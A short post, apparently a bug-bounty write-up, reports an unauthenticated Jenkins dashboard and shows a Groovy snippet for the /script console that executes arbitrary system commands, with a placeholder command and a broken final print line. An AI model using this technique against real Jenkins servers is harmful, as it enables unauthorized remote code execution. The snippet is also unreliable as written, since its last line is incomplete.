Khaled Nassar
Khaled Nassar

Posted on

Remote Code Execution on subdomain

i've found Jenkins on does not require authentication for access dashboard

what can i do with this .?

everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${}"
